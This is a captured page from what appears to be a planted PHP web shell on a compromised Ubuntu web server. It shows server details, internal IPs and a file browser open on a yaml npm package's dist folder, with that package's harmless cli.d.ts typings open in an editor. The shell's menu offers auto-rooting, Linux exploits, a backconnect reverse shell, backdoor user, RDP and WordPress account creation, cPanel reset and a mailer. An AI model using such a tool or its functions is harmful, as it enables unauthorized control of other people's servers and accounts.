Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
yaml /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
compose
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
nodes
[ DIR ]
drwxr-xr-x
parse
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
stringify
[ DIR ]
drwxr-xr-x
cli.d.ts
1.17
KB
-rw-r--r--
cli.mjs
7.17
KB
-rw-r--r--
errors.d.ts
1.21
KB
-rw-r--r--
errors.js
2.07
KB
-rw-r--r--
index.d.ts
1.31
KB
-rw-r--r--
index.js
1.73
KB
-rw-r--r--
log.d.ts
226
B
-rw-r--r--
log.js
421
B
-rw-r--r--
options.d.ts
10.76
KB
-rw-r--r--
public-api.d.ts
2.77
KB
-rw-r--r--
public-api.js
4.09
KB
-rw-r--r--
test-events.d.ts
96
B
-rw-r--r--
test-events.js
4.17
KB
-rw-r--r--
util.d.ts
709
B
-rw-r--r--
util.js
1008
B
-rw-r--r--
visit.d.ts
4.95
KB
-rw-r--r--
visit.js
9.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cli.d.ts
export declare const help = "yaml: A command-line YAML processor and inspector\n\nReads stdin and writes output to stdout and errors & warnings to stderr.\n\nUsage:\n yaml Process a YAML stream, outputting it as YAML\n yaml cst Parse the CST of a YAML stream\n yaml lex Parse the lexical tokens of a YAML stream\n yaml valid Validate a YAML stream, returning 0 on success\n\nOptions:\n --help, -h Show this message.\n --json, -j Output JSON.\n --indent 2 Output pretty-printed data, indented by the given number of spaces.\n\nAdditional options for bare \"yaml\" command:\n --doc, -d Output pretty-printed JS Document objects.\n --single, -1 Require the input to consist of a single YAML document.\n --strict, -s Stop on errors.\n --visit, -v Apply a visitor to each document (requires a path to import)\n --yaml 1.1 Set the YAML version. (default: 1.2)"; export declare class UserError extends Error { static ARGS: number; static SINGLE: number; code: number; constructor(code: number, message: string); } export declare function cli(stdin: NodeJS.ReadableStream, done: (error?: Error) => void, argv?: string[]): Promise<void>;
Close